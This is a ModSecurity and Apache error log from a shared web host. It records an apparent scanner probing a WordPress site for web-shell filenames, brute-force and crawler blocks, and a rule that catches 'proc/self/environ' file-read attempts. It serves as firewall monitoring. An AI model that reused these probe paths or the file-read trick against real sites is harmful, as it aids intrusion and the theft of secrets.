[Tue May 26 19:14:51.002927 2026] [security2:error] [pid 26857:tid 27018] [client 57.141.2.21:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj0tfoqtHEG_e9i6GlfAAAAKQ"]
[Tue May 26 19:14:51.132892 2026] [security2:error] [pid 26857:tid 26925] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/like.php"] [unique_id "ahWj09foqtHEG_e9i6GlmgAA30M"]
[Tue May 26 19:14:51.133045 2026] [security2:error] [pid 26857:tid 27077] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/like.php"] [unique_id "ahWj09foqtHEG_e9i6GlmgAA30M"]
[Tue May 26 19:14:51.225178 2026] [security2:error] [pid 26857:tid 26929] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/.well-known/about.php"] [unique_id "ahWj09foqtHEG_e9i6GlogAAy0c"]
[Tue May 26 19:14:51.225332 2026] [security2:error] [pid 26857:tid 27057] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/.well-known/about.php"] [unique_id "ahWj09foqtHEG_e9i6GlogAAy0c"]
[Tue May 26 19:14:51.340213 2026] [security2:error] [pid 26857:tid 26930] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWj09foqtHEG_e9i6GlpgAA1kg"]
[Tue May 26 19:14:51.340399 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-includes/ID3/about.php"] [unique_id "ahWj09foqtHEG_e9i6GlpgAA1kg"]
[Tue May 26 19:14:51.381259 2026] [security2:error] [pid 26857:tid 26927] [remote 211.23.68.235:8170] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.68.23.211.testwprbl.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "176"] [id "900407"] [msg "Wordpress and Joomla Brute RBL: testwprbl.websitewelcome.com"] [hostname "freshmindsolutions.com"] [uri "/wp-login.php"] [unique_id "ahWj09foqtHEG_e9i6GlnAAA9UU"]
[Tue May 26 19:14:51.465569 2026] [security2:error] [pid 26857:tid 26933] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/bob.php"] [unique_id "ahWj09foqtHEG_e9i6GlsAAA5ks"]
[Tue May 26 19:14:51.465764 2026] [security2:error] [pid 26857:tid 27084] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/bob.php"] [unique_id "ahWj09foqtHEG_e9i6GlsAAA5ks"]
[Tue May 26 19:14:51.864871 2026] [security2:error] [pid 26857:tid 27002] [client 147.53.114.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.anujtradingco.com"] [uri "/index.php"] [unique_id "ahWj09foqtHEG_e9i6GlxgAAAJQ"], referer: https://www.anujtradingco.com/
[Tue May 26 19:14:52.037097 2026] [security2:error] [pid 26857:tid 26934] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/t3s.php"] [unique_id "ahWj1NfoqtHEG_e9i6GlzQAAykw"]
[Tue May 26 19:14:52.037268 2026] [security2:error] [pid 26857:tid 27056] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/t3s.php"] [unique_id "ahWj1NfoqtHEG_e9i6GlzQAAykw"]
[Tue May 26 19:14:52.198338 2026] [security2:error] [pid 26857:tid 26935] [remote 216.73.216.30:35441] ModSecurity: Access denied with connection close (phase 1). Pattern match "proc/self/environ" at REQUEST_URI. [file "/opt/mod_security/hg_rules.conf"] [line "1161"] [id "999997"] [msg "proc environ"] [hostname "billing.mosykay.com"] [uri "/app/password/reset"] [unique_id "ahWj1NfoqtHEG_e9i6Gl1gAAl00"]
[Tue May 26 19:14:52.449284 2026] [autoindex:error] [pid 26857:tid 26936] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/css/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:52.450531 2026] [security2:error] [pid 26857:tid 27073] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj1NfoqtHEG_e9i6Gl3gAA204"]
[Tue May 26 19:14:52.599309 2026] [security2:error] [pid 26857:tid 27020] [client 57.141.2.47:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj1NfoqtHEG_e9i6Gl1AAAAKY"]
[Tue May 26 19:14:52.976184 2026] [security2:error] [pid 26857:tid 26999] [client 74.249.212.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWj1NfoqtHEG_e9i6Gl7QAAkVw"]
[Tue May 26 19:14:52.976215 2026] [security2:error] [pid 26857:tid 26999] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "301"] [hostname "www.kingsclub.in"] [uri "/index.php"] [unique_id "ahWj1NfoqtHEG_e9i6Gl7QAAkVw"]
[Tue May 26 19:14:53.645367 2026] [security2:error] [pid 26857:tid 27094] [client 74.249.212.138:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWj1dfoqtHEG_e9i6GmEwAA8GM"]
[Tue May 26 19:14:53.645403 2026] [security2:error] [pid 26857:tid 27094] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "404"] [hostname "kingsclub.in"] [uri "/index.php"] [unique_id "ahWj1dfoqtHEG_e9i6GmEwAA8GM"]
[Tue May 26 19:14:53.830790 2026] [security2:error] [pid 26857:tid 27114] [client 66.249.66.199:44576] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWj1dfoqtHEG_e9i6GmCQAAAQQ"]
[Tue May 26 19:14:54.077772 2026] [autoindex:error] [pid 26857:tid 26967] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-admin/css/colors/modern/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:54.078666 2026] [security2:error] [pid 26857:tid 26967] [remote 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj1tfoqtHEG_e9i6GmPAAAjm0"]
[Tue May 26 19:14:54.169542 2026] [security2:error] [pid 26857:tid 26970] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/uwu.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmSwAA_3A"]
[Tue May 26 19:14:54.169708 2026] [security2:error] [pid 26857:tid 27109] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/uwu.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmSwAA_3A"]
[Tue May 26 19:14:54.177757 2026] [security2:error] [pid 26857:tid 27072] [client 147.53.114.57:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "anujtradingco.com"] [uri "/index.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmRQAAANo"], referer: https://www.anujtradingco.com/top-deejay-headphones/?unapproved=1242310&moderation-hash=12db71cca33677fe78974b191f9624fa
[Tue May 26 19:14:54.229617 2026] [security2:error] [pid 26857:tid 27013] [client 66.249.66.32:37289] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "moneyapp.com.co"] [uri "/index.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmTAAAAJ8"]
[Tue May 26 19:14:54.391818 2026] [security2:error] [pid 26857:tid 26973] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/uwa.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmVgAAy3M"]
[Tue May 26 19:14:54.391988 2026] [security2:error] [pid 26857:tid 27057] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/uwa.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmVgAAy3M"]
[Tue May 26 19:14:54.484888 2026] [security2:error] [pid 26857:tid 26858] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/crgio.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmXgAA1gA"]
[Tue May 26 19:14:54.485035 2026] [security2:error] [pid 26857:tid 27068] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/crgio.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmXgAA1gA"]
[Tue May 26 19:14:54.627843 2026] [security2:error] [pid 26857:tid 26864] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/geforce.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmawAAvwY"]
[Tue May 26 19:14:54.628032 2026] [security2:error] [pid 26857:tid 27045] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/geforce.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmawAAvwY"]
[Tue May 26 19:14:54.717424 2026] [security2:error] [pid 26857:tid 26978] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/pucci.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmbQAA33g"]
[Tue May 26 19:14:54.717584 2026] [security2:error] [pid 26857:tid 27077] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/pucci.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmbQAA33g"]
[Tue May 26 19:14:54.864394 2026] [autoindex:error] [pid 26857:tid 26977] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/blocks/details/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:54.865366 2026] [security2:error] [pid 26857:tid 27107] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj1tfoqtHEG_e9i6GmcwAA_Xc"]
[Tue May 26 19:14:55.015775 2026] [autoindex:error] [pid 26857:tid 26980] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/blocks/audio/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:55.016608 2026] [security2:error] [pid 26857:tid 26980] [remote 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj1tfoqtHEG_e9i6GmggAAmXo"]
[Tue May 26 19:14:55.167976 2026] [security2:error] [pid 26857:tid 26979] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj19foqtHEG_e9i6GmhwAA8Xk"]
[Tue May 26 19:14:55.354851 2026] [security2:error] [pid 26857:tid 27111] [client 57.141.2.69:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj1tfoqtHEG_e9i6GmewAAAQE"]
[Tue May 26 19:14:55.444666 2026] [security2:error] [pid 26857:tid 26870] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/one.php"] [unique_id "ahWj19foqtHEG_e9i6GmkAAA8gw"]
[Tue May 26 19:14:55.444866 2026] [security2:error] [pid 26857:tid 27096] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/one.php"] [unique_id "ahWj19foqtHEG_e9i6GmkAAA8gw"]
[Tue May 26 19:14:55.554421 2026] [security2:error] [pid 26857:tid 26984] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-temp.php"] [unique_id "ahWj19foqtHEG_e9i6GmmwAA1H4"]
[Tue May 26 19:14:55.554587 2026] [security2:error] [pid 26857:tid 27066] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-temp.php"] [unique_id "ahWj19foqtHEG_e9i6GmmwAA1H4"]
[Tue May 26 19:14:55.863345 2026] [security2:error] [pid 26857:tid 26874] [remote 216.73.216.30:48044] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 30.216.73.216.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "billing.mosykay.com"] [uri "/"] [unique_id "ahWj19foqtHEG_e9i6GmtAAA8RA"]
[Tue May 26 19:14:56.078211 2026] [autoindex:error] [pid 26857:tid 26875] [remote 74.249.212.138:0] AH01276: Cannot serve directory /home2/kingsr2o/public_html/wp-includes/blocks/buttons/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 19:14:56.079038 2026] [security2:error] [pid 26857:tid 26996] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "403"] [hostname "www.kingsclub.in"] [uri "/cgi-sys/403.html"] [unique_id "ahWj2NfoqtHEG_e9i6GmuwAAjhE"]
[Tue May 26 19:14:56.200442 2026] [security2:error] [pid 26857:tid 26877] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/xmu.php"] [unique_id "ahWj2NfoqtHEG_e9i6GmwAABBBM"]
[Tue May 26 19:14:56.200664 2026] [security2:error] [pid 26857:tid 27114] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/xmu.php"] [unique_id "ahWj2NfoqtHEG_e9i6GmwAABBBM"]
[Tue May 26 19:14:56.604983 2026] [security2:error] [pid 26857:tid 26885] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/mode.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm2QAAqBs"]
[Tue May 26 19:14:56.605157 2026] [security2:error] [pid 26857:tid 27022] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/mode.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm2QAAqBs"]
[Tue May 26 19:14:56.695080 2026] [security2:error] [pid 26857:tid 26887] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm4gAA5B0"]
[Tue May 26 19:14:56.695258 2026] [security2:error] [pid 26857:tid 27082] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/wp-admin/js/index.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm4gAA5B0"]
[Tue May 26 19:14:56.944260 2026] [security2:error] [pid 26857:tid 26891] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/dx.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm7QAAviE"]
[Tue May 26 19:14:56.944426 2026] [security2:error] [pid 26857:tid 27044] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/dx.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm7QAAviE"]
[Tue May 26 19:14:57.348992 2026] [security2:error] [pid 26857:tid 27067] [client 57.141.2.22:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahWj2NfoqtHEG_e9i6Gm7AAAANU"]
[Tue May 26 19:14:57.384797 2026] [security2:error] [pid 26857:tid 27064] [client 114.119.150.249:50013] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "rainadelproperties.com"] [uri "/listings/apartments"] [unique_id "ahWj2dfoqtHEG_e9i6GnCQAAANI"], referer: https://rainadelproperties.com/properties/apartment-on-park-avenue
[Tue May 26 19:14:57.399987 2026] [security2:error] [pid 26857:tid 26901] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/puc.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnCgAAuys"]
[Tue May 26 19:14:57.400143 2026] [security2:error] [pid 26857:tid 27041] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/puc.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnCgAAuys"]
[Tue May 26 19:14:57.511142 2026] [security2:error] [pid 26857:tid 26898] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/themes.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnDQAAlSg"]
[Tue May 26 19:14:57.511349 2026] [security2:error] [pid 26857:tid 27003] [client 74.249.212.138:0] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "www.kingsclub.in"] [uri "/themes.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnDQAAlSg"]
[Tue May 26 19:14:57.602838 2026] [security2:error] [pid 26857:tid 26902] [remote 74.249.212.138:0] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 138.212.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "www.kingsclub.in"] [uri "/dx.php"] [unique_id "ahWj2dfoqtHEG_e9i6GnFwAA-Sw"]
